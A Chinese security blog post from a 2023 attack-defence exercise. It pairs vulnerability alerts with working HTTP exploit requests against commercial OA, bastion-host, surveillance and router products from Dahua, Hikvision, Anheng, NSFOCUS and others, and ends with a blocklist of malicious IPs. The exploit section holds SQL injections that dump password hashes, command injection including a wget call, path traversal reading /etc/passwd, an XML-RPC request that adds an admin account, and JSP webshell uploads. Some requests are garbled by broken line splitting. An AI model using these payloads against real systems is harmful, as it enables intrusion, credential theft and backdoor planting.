免责声明
今天是2023年8月11号周五,HW第三天,山重水复疑无路,柳暗花明又一村,告警多很吓人,告警少更吓人,好累哦!
“拿核弹打蚂蚁”,“继承去年nginx的传说”
运行就弹出计算器然后一个弹窗 你不小心被卫星了---by小艾
(PS:为啥叫漏洞情报,什么什么情报,就是通知一下,咱也不确定不是,能有个心理准备,不怕万一就怕一万,对吧!)
一、今日份漏洞情报
来自360HW情报
【演练实时消息】
【消息时间】:2023-08-11 09:55
【消息标题】:安恒明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
【消息详情】:360漏洞云监测到《安恒明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002528,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:00
【消息标题】:锐捷NBR路由器 fileupload.php 任意文件上传漏洞
【消息详情】:360漏洞云监测到《锐捷NBR路由器 fileupload.php 任意文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002533,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:30
【消息标题】:大华 DSS sendCustomerMsg 前台命令执行漏洞
【消息详情】:360漏洞云监测到《大华 DSS sendCustomerMsg 前台命令执行漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002545,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:30
【消息标题】:大华智慧园区综合管理平台 searchJson SQL注入漏洞
【消息详情】:360漏洞云监测到《大华智慧园区综合管理平台 searchJson SQL注入漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002538,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 12:20
【消息标题】:大华智慧园区综合管理平台 video 文件上传漏洞
【消息详情】:360漏洞云监测到《大华智慧园区综合管理平台 video 文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002561,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 16:20
【消息标题】:海康威视 IVMS-8700平台 upload.action 文件上传漏洞
【消息详情】:360漏洞云监测到《海康威视 IVMS-8700平台 upload.action 文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响版本【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002571,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
来个免责声明哈,刚哥YYDS!请师傅们自行合法验证!
由于传播、利用作者所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
汉得SRM tomcat.jsp 登录绕过漏洞
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
然后访问后台:/main.screen
sxf-报表系统
POST /rep/login HTTP/1.1
Host: URL
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
某盟sas安全审计系统任意文件读取漏洞
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
某凌OA前台代码执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={
"body"
:{
"file"
:
"file:///etc/passwd"
}}
某联达oa sql注入漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
某达OA sql注入漏洞
GET /general/
system
/seal_manage/iweboffice/delete_seal.php?DELETE_STR=
1
)%20and%20(
substr
(DATABASE(),
1
,
1
))=char(
84
)%20and%20(
select
%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(
1
)=(
1
HTTP/
1.1
Host:
127.0
.
0
.
1
:
8080
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64; rv:
109.0
) Gecko/
20100101
Firefox/
116.0
Accept: text/html,application/xhtml+xml,application/xml;
q
=
0
.
9
,image/avif,image/webp,*
/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests:
1
某x服应用交付系统命令执行漏洞
POST /rep/login
Host:
10.10
.
10.1
:
85
clsMode=cls_mode_login%0Als%0A&
index
=
index
&log_type=report&loginType=account&page=login&rnd=
0
&userID=admin&userPsw=
123
某信景云终端安全管理系统 login SQL注入漏洞
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(
select
*
from
(
select
+
sleep
(
3
))a)=
'
某恒明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<
methodCall
>
<
methodName
>
web.user_add
</
methodName
>
<
params
>
<
param
>
<
value
>
<
array
>
<
data
>
<
value
>
<
string
>
admin
</
string
>
</
value
>
<
value
>
<
string
>
5
</
string
>
</
value
>
<
value
>
<
string
>
XX.XX.XX.XX
</
string
>
</
value
>
</
data
>
</
array
>
</
value
>
</
param
>
<
param
>
<
value
>
<
struct
>
<
member
>
<
name
>
uname
</
name
>
<
value
>
<
string
>
deptadmin
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
name
</
name
>
<
value
>
<
string
>
deptadmin
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
pwd
</
name
>
<
value
>
<
string
>
Deptadmin@123
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
authmode
</
name
>
<
value
>
<
string
>
1
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
deptid
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
mobile
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
comment
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
roleid
</
name
>
<
value
>
<
string
>
101
</
string
>
</
value
>
</
member
>
</
struct
>
</
value
>
</
param
>
</
params
>
</
methodCall
>
HiKVISION 综合安防管理平台 report 任意文件上传漏洞
POST /svm/api/
external
/report HTTP/
1.1
Host:
10.10
.10.10
Content-Type: multipart/form-
data
; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-
data
; name=
"file"
; filename=
"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
马儿路径:/portal/ui/login/..;/..;/new.jsp
HiKVISION 综合安防管理平台 files 任意文件上传漏洞
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
某微 E-Cology 某版本 SQL注入漏洞
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0
某和OA C6-GetSqlData.aspx SQL注入漏洞
POST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'
大华智慧园区综合管理平台 searchJson SQL注入漏洞
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(
1
,concat(
0x7e
,(
select
%20md5(
388609
)),
0x7e
),
1
)--%22%7D/extend/%7B%7D HTTP/
1.1
Host:
127.0
.
0
.
1
:
7443
User-Agent: Mozilla/
5.0
(Macintosh; Intel Mac OS X
10_14_3
) AppleWebKit/
605.1
.
15
(KHTML, like Gecko) Version/
12.0
.
3
Safari/
605.1
.
15
Accept-Encoding: gzip, deflate
Connection:
close
大华智慧园区综合管理平台 文件上传漏洞
POST /publishing/publishing/material/file/video HTTP/
1.1
Host:
127.0
.0
.1
:
7443
User-Agent: Mozilla/
5.0
(Macintosh; Intel Mac OS X
10
_14_3) AppleWebKit/
605.1
.15
(KHTML, like Gecko) Version/
12.0
.3
Safari/
605.1
.15
Content-Length:
804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"Filedata"
; filename=
"0EaE10E7dF5F10C2.jsp"
<%
contentType=
"text/html; charset=GBK"
%><%
import
=
"java.math.BigInteger"
%><%
import
=
"java.security.MessageDigest"
%><% MessageDigest md5 =
null
;md5 = MessageDigest.getInstance(
"MD5"
);
String
s =
"123456"
;
String
miyao =
""
;
String
jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());
String
md5String =
new
BigInteger(
1
, md5.digest()).toString(
16
);out.println(md5String);
new
java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"poc"
poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name=
"Submit"
submit
--dd8f988919484abab3816881c55272a7--
某友时空KSOA PayBill SQL注入漏洞
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 134
Accept-Encoding: gzip, deflate
Connection: close
<
root
>
<
name
>
1
</
name
>
<
name
>
1'WAITFOR DELAY '00:00:03';-
</
name
>
<
name
>
1
</
name
>
<
name
>
102360
</
name
>
</
root
>
某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
GET
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
HTTP/1.1
Host
: 1.1.1.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding
: gzip, deflate
Connection
: close
某盟 SAS堡垒机 GetFile 任意文件读取漏洞
GET
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
HTTP/1.1
Host
: 1.1.1.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type
: application/x-www-form-urlencoded
Accept-Encoding
: gzip, deflate
Connection
: close
某盟 SAS堡垒机 Exec 远程命令执行漏洞
GET
/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx
HTTP/1.1
Host
: 1.1.1.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type
: application/x-www-form-urlencoded
Accept-Encoding
: gzip, deflate
Connection
: close
某微E-Office9文件上传漏洞
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
注意事项!!!!!:::::仅供参考以及验证自己系统是否存在漏洞并且加固,请勿用于违法行为,否则与本作者无关!!!!
详情请看,不过这个人家360已经知道了,正在优化后面不能用了
二、恶意IP(建议封禁)
来源:知道创宇安全智脑,微步情报社区,CT情报,以及本小弟收集
(有师傅反馈,可能有重复的,这个我发现确实无法避免哈哈哈)
217
.198
.212
.162
62
.233
.50
.179
167
.94
.138
.107
167
.248
.133
.129
178
.62
.6
.239
185
.180
.143
.18
185
.180
.143
.141
45
.95
.146
.77
46
.32
.172
.88
80
.82
.65
.201
8
.219
.119
.144
139
.162
.177
.147
39
.162
.177
.147
147
.139
.78
.144
47
.243
.6
.177
223
.104
.194
.129
8
.219
.119
.144
162
.142
.125
.129
185
.189
.182
.234
107
.170
.225
.15
185
.189
.182
.234
67
.94
.138
.100
85
.189
.182
.234
221
.2
.36
.250
223
.4
.74
.93
124
.70
.30
.150
115
.198
.200
.10
47
.115
.218
.66
8
.218
.77
.79
211
.46
.18
.1
45
.79
.181
.179
43
.136
.40
.252
61
.52
.2
.34
124
.225
.80
.200
123
.193
.240
.13
121
.224
.79
.7
74
.82
.47
.46
162
.142
.125
.139
193
.163
.125
.165
112
.17
.79
.156
170
.64
.134
.89
31
.220
.1
.83
123
.56
.22
.106
101
.200
.156
.142
47
.93
.99
.200
47
.94
.105
.223
47
.96
.104
.32
31
.220
.1
.83
74
.82
.47
.5
184
.105
.247
.207
137
.184
.105
.192
62
.233
.50
.179
111
.7
.96
.156
111
.7
.100
.31
211
.95
.50
.8
111
.7
.96
.152
167
.94
.138
.111
创宇恶意
IP
198
.235
.24
.220
198
.235
.24
.216
141
.98
.6
.73
205
.210
.31
.180
198
.235
.24
.230
205
.210
.31
.80
205
.210
.31
.242
198
.235
.24
.234
205
.210
.31
.71
205
.210
.31
.83
205
.210
.31
.215
198
.235
.24
.184
205
.210
.31
.47
205
.210
.31
.253
205
.210
.31
.230
205
.210
.31
.65
205
.210
.31
.217
198
.235
.24
.240
205
.210
.31
.197
205
.210
.31
.104
198
.235
.24
.198
205
.210
.31
.74
198
.235
.24
.213
198
.235
.24
.239
205
.210
.31
.137
205
.210
.31
.255
205
.210
.31
.239
205
.210
.31
.175
205
.210
.31
.254
198
.235
.24
.228
205
.210
.31
.106
205
.210
.31
.226
198
.235
.24
.176
198
.235
.24
.243
205
.210
.31
.195
198
.235
.24
.229
205
.210
.31
.86
205
.210
.31
.196
198
.235
.24
.200
198
.235
.24
.202
205
.210
.31
.178
198
.235
.24
.244
205
.210
.31
.181
198
.235
.24
.219
205
.210
.31
.89
205
.210
.31
.78
205
.210
.31
.85
198
.235
.24
.175
205
.210
.31
.162
205
.210
.31
.3
205
.210
.31
.194
205
.210
.31
.183
113
.219
.160
.192
205
.210
.31
.214
198
.235
.24
.193
205
.210
.31
.105
198
.235
.24
.166
205
.210
.31
.213
198
.235
.24
.241
205
.210
.31
.206
205
.210
.31
.203
205
.210
.31
.235
198
.235
.24
.183
205
.210
.31
.199
198
.235
.24
.252
205
.210
.31
.95
205
.210
.31
.68
198
.235
.24
.182
198
.235
.24
.152
205
.210
.31
.72
205
.210
.31
.36
205
.210
.31
.52
185
.191
.171
.4
205
.210
.31
.93
205
.210
.31
.204
205
.210
.31
.186
205
.210
.31
.172
198
.235
.24
.249
113
.219
.160
.191
205
.210
.31
.108
205
.210
.31
.169
198
.235
.24
.206
205
.210
.31
.88
205
.210
.31
.232
205
.210
.31
.245
205
.210
.31
.163
205
.210
.31
.76
34
.70
.155
.212
205
.210
.31
.201
198
.235
.24
.214
205
.210
.31
.66
198
.235
.24
.192
205
.210
.31
.218
205
.210
.31
.236
198
.235
.24
.194
198
.235
.24
.236
198
.235
.24
.225
205
.210
.31
.229
198
.235
.24
.180
205
.210
.31
.69
205
.210
.31
.192
205
.210
.31
.240
205
.210
.31
.244
205
.210
.31
.212
205
.210
.31
.164
198
.235
.24
.170
205
.210
.31
.129
205
.210
.31
.210
205
.210
.31
.149
198
.235
.24
.255
205
.210
.31
.221
205
.210
.31
.171
205
.210
.31
.227
205
.210
.31
.202
205
.210
.31
.248
205
.210
.31
.37
205
.210
.31
.67
205
.210
.31
.233
198
.235
.24
.215
205
.210
.31
.79
171
.212
.116
.210
205
.210
.31
.98
198
.235
.24
.232
205
.210
.31
.234
205
.210
.31
.165
205
.210
.31
.92
205
.210
.31
.87
205
.210
.31
.60
205
.210
.31
.231
198
.235
.24
.177
198
.235
.24
.223
205
.210
.31
.193
198
.235
.24
.162
205
.210
.31
.102
198
.235
.24
.245
14
.36
.39
.7
198
.235
.24
.164
205
.210
.31
.103
205
.210
.31
.51
205
.210
.31
.99
198
.235
.24
.247
198
.235
.24
.208
205
.210
.31
.70
205
.210
.31
.222
103
.231
.172
.146
205
.210
.31
.64
198
.235
.24
.209
205
.210
.31
.96
216
.244
.66
.247
205
.210
.31
.110
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论